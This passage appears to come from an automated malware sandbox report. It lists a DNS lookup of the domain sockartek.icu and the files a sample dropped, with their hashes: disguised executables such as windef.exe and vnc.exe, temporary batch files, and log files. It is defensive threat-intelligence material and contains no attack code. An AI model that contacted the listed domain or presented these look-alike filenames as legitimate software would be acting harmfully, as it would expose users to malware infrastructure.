                                        DNS Request: sockartek.icu
                                      • 8.8.8.8:53 | sockartek.icu | dns | 59 B | 124 B | 1 | 1
                                        DNS Request: sockartek.icu
                                      MITRE ATT&CK Enterprise v15

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\windef.exe.log
                                        Filesize: 1KB
                                        MD5: 10eab9c2684febb5327b6976f2047587
                                        SHA1: a12ed54146a7f5c4c580416aecb899549712449e
                                        SHA256: f49dbd55029bfbc15134f7c6a4f967d6c39142c63f2e8f1f8c78fab108a2c928
                                        SHA512: 7e5fd90fffae723bd0c662a90e0730b507805f072771ee673d1d8c262dbf60c8a03ba5fe088f699a97c2e886380de158b2ccd59ee62e3d012dd6dd14ea9d0e50
                                      • C:\Users\Admin\AppData\Local\Temp\WcRtpUTMoxCx.bat
                                        Filesize: 208B
                                        MD5: 16c933c2dae1dd28898d8e81922dd5a5
                                        SHA1: 31b1d12ca147d95a24051550e1f716fb11a954f7
                                        SHA256: 6f27e22357cd43b329f66db2034699ebbdbe7792e5d95d78f48f765429262d78
                                        SHA512: 0eed504fb039d8eb51061c32ee700540e36ef93624bbba70d3398d8a465fc32dc45c1285f5341d59313d814182348b11b2c746f50f787dfaed48ae37ba3adc0c
                                      • C:\Users\Admin\AppData\Local\Temp\pMXiLzecL3Ep.bat
                                        Filesize: 208B
                                        MD5: ac9a53ea2367b2f7673a1734f42a7217
                                        SHA1: ef82139a5d9b0ade873d5baf9e5920a1b4b7e6cf
                                        SHA256: 5aa33e9e0037000009088e57847df19e2d91f4587eff4853c5c7e04b8b9a782c
                                        SHA512: 49e5bc9fd2fcd6e8a5e79037d9e774c198847f74bc1b5004c678c597e1b2a65413127bb81155a9088b0f8ffc5ac61ac82ec1dab881c18a3bc85c559423902a5e
                                      • C:\Users\Admin\AppData\Local\Temp\vnc.exe
                                        Filesize: 405KB
                                        MD5: b8ba87ee4c3fc085a2fed0d839aadce1
                                        SHA1: b3a2e3256406330e8b1779199bb2b9865122d766
                                        SHA256: 4e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4
                                        SHA512: 7a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2
                                      • C:\Users\Admin\AppData\Local\Temp\windef.exe
                                        Filesize: 349KB
                                        MD5: b4a202e03d4135484d0e730173abcc72
                                        SHA1: 01b30014545ea526c15a60931d676f9392ea0c70
                                        SHA256: 7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9
                                        SHA512: 632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb
                                      • C:\Users\Admin\AppData\Roaming\Logs\12-01-2024
                                        Filesize: 224B
                                        MD5: 37d886917a968bd9094b1e1d72ead4df
                                        SHA1: 75fffad0817f0d59f7c24567f7b9867681c405f2
                                        SHA256: 4ed87f11a208817957b5a76a7a9a8cebb20bcc0842e1164e2b5ae4d383eb80bd
                                        SHA512: 18601b2d8418382f3fd622ae0844b2c39533148785adce45e38873ffd7b437e8a41c79b8caa1cba836b9c1fdb7dcaf8fb9be10cab4a571bb00771b9fb020f76e
                                      • C:\Users\Admin\AppData\Roaming\Logs\12-01-2024
                                        Filesize: 224B
                                        MD5: 772fd38095d601403bf0fea378589daf
                                        SHA1: 7c748f677c6cec207b7915652cf203165429a51d
                                        SHA256: e5825b42933d7854fa74241ef3045cd6387292f85643dd9036df0e073916ce0c
                                        SHA512: e3cd401362c4910cf20a693df69b5b05c32656f5dcb98e7a61743635096f8162e4854f5d0a23fbb0b96bfb32d49c250d0fcda513e22d6e460b6add06770ae50d
                                      • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                                        Filesize: 2.0MB
                                        MD5: 954f23783ff03120254f36f1780af7e5
                                        SHA1: bdf9f43650fe4d4fe9d1649210f710b0efef5b72
                                        SHA256: b849a13cf292a2a76b4a06cf0e60f6a9bbe3dce2661e9e55c957b18ef7c15e8e
                                        SHA512: 3ab2d8c3bfe132ecd75cface458dff89fe8a5a1c1a7ab9b93e2d9d0dd6189a6adec5ce755c4fd6328758b65eb8e81622e00b69c0837a92326f26e697eb165b84
                                      • memory/1476-19-0x00000000001C0000-0x00000000001E0000-memory.dmp
                                        Filesize: 128KB
                                      • memory/1476-28-0x00000000001C0000-0x00000000001E0000-memory.dmp
                                        Filesize: 128KB
                                      • memory/1612-79-0x00000000004B0000-0x00000000004D0000-memory.dmp
                                        Filesize: 128KB
                                      • memory/1612-73-0x00000000004B0000-0x00000000004D0000-memory.dmp
                                        Filesize: 128KB
                                      • memory/1648-88-0x0000000075710000-0x0000000075B60000-memory.dmp
                                        Filesize: 4.3MB
                                      • memory/1648-18-0x0000000004240000-0x0000000004241000-memory.dmp
                                        Filesize: 4KB
                                      • memory/2180-29-0x0000000000FF0000-0x000000000104E000-memory.dmp
                                        Filesize: 376KB
                                      • memory/2180-36-0x0000000006CB0000-0x0000000006CEC000-memory.dmp
                                        Filesize: 240KB
                                      • memory/2180-35-0x0000000006770000-0x0000000006782000-memory.dmp
                                        Filesize: 72KB
                                      • memory/2180-34-0x0000000005A70000-0x0000000005AD6000-memory.dmp
                                        Filesize: 408KB
                                      • memory/2180-33-0x0000000005AF0000-0x0000000005B82000-memory.dmp
                                        Filesize: 584KB
                                      • memory/2180-32-0x00000000060A0000-0x0000000006644000-memory.dmp
                                        Filesize: 5.6MB
                                      • memory/3948-44-0x0000000006D70000-0x0000000006D7A000-memory.dmp
                                        Filesize: 40KB
